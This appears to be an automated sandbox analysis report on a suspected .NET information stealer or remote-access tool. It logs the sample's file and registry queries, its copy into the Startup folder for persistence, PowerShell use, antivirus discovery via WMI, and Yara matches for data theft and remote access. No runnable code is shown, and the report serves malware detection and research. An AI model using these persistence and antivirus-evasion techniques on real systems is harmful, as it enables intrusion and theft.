Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: KFPYr6f43H.exe, 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $dq(C:\Program Files\AVG\Antivirus\AVGUI.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $dq.exe.IUGVA\surivitnA\GVA\)68x( seliF margorP\:C`,dq.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2078607715.0000000000D20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $dq.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $dq.exe.IUGVA\surivitnA\GVA\)68x( seliF margorP\:C`,dq(C:\Program Files\AVG\Antivirus\AVGUI.exe
Source: KFPYr6f43H.exe, 00000000.00000002.3352034906.0000000001662000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\KFPYr6f43H.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 7.2.KFPYr6f43H.exe.7d20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.KFPYr6f43H.exe.2c40674.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2104534573.0000000007D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KFPYr6f43H.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: KFPYr6f43H.exe PID: 8012, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 7.2.KFPYr6f43H.exe.7d20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.KFPYr6f43H.exe.2c40674.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2104534573.0000000007D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KFPYr6f43H.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: KFPYr6f43H.exe PID: 8012, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs